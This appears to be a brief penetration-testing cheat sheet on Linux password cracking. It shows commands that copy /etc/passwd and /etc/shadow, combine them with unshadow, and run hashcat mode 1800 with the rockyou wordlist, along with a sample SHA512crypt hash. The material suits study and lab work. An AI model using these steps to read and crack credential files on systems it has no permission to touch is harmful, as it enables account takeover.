Shadow

If we have read access to shadow file and passwd we can use the following method to gain password hash and crack it using hashcat.

# copy the contents of /etc/passwd and /etc/shadow file to your attacking machine.
cat /etc/passwd > passwd
cat /etc/shadow > shadow

Use the following tool to convert both files into a crackable form.

unshadow passwd shadow > unshadowed

Now remove the unwanted content and keep the users hashes like this.

# I removed all the other users and only kept one user.
cat unshadowed          
jacob:$6$U1PPMuDVS0UeUB.k$a5gdmzT0yt3kFR1hZVBeUhsZc9zUtKbIaP.fUt8OT0Fs0ot76bQGn4lTvsK551DUQNOD8hgxjcYZrR09nTcDB0:1000:1000:,,,:/home/kali:/usr/bin/zsh

Now we'll use hashcat with mode 1800 for "SHA512crypt $6$, SHA512 (Unix)" hash.

hashcat -m 1800 unshadowed /usr/share/wordlists/rockyou.txt

Last updated